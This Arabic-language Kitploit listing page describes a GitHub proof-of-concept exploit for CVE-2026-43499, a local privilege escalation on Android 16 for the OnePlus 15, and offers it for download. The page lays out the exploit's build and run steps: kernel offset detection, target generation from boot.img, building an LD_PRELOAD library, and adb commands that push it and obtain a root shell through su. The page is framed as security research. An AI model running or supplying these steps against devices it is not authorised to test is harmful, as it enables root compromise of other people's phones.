Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-43499-OnePlus15 — دليل تعليمي لإثبات المفهوم لتصعيد الامتيازات المحلية على نظام أندرويد 16 لهاتف OnePlus 15، يتضمن اكتشاف إزاحات النواة، وتوليد الأهداف، وبناء الاستغلال القائم على LD_PRELOAD. | Kitploit
أدوات/GitHubGitHub/bartixxx32/cve-2026-43499-oneplus15
أمان أندرويدتصعيد الامتيازاتالاستغلالأمن الجوالالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائية
GitHubbartixxx32/cve-2026-43499-oneplus15

CVE-2026-43499-OnePlus15

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

دليل تعليمي لإثبات المفهوم لتصعيد الامتيازات المحلية على نظام أندرويد 16 لهاتف OnePlus 15، يتضمن اكتشاف إزاحات النواة، وتوليد الأهداف، وبناء الاستغلال القائم على LD_PRELOAD.

عرض المستودع
635منذ شهر واحدلم تتم المراجعة بعد

CVE-2026-43499 — OnePlus 15 LPE (PoC تعليمي)

تحذير: هذا المستودع مُقدم لأغراض تعليمية وبحثية فقط. لا يتم توزيع أي ملفات ثنائية أو إصدارات مبنية مسبقًا. يجب عليك بناء كل شيء من المصدر.

تصعيد الامتيازات المحلي لنظام Android 16 على OnePlus 15.

نسخة معدلة (Fork) من x-spy/CVE-2026-43499-popsicle مع إصلاح محاذاة kallsyms وملف تعريف OnePlus 15 موثوق.

ملف التعريف

يحتوي ملف التعريف على عنوانين فيزيائيين يجب تأكيدهما من جهاز تم تجذيره (rooted) يعمل بنفس البرنامج الثابت (firmware):

root@kitploit:~
{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000"
}

الكشف التلقائي باستخدام جهاز مجذر:

root@kitploit:~
python3 detect_offset.py

إنشاء الهدف

يتطلب Python 3 و llvm-objdump:

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --profile profile_oneplus15.json \
  -o source/src/target.h

البناء

root@kitploit:~
make -C source clean preload

إذا لم يتم اكتشاف NDK تلقائيًا:

root@kitploit:~
NDK_ROOT=/path/to/android-ndk make -C source clean preload

الناتج: source/build/bin/preload.so

التشغيل

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id

الاعتمادات

  • x-spy للاستغلال الأصلي واكتشاف CVE
تنزيل الأداة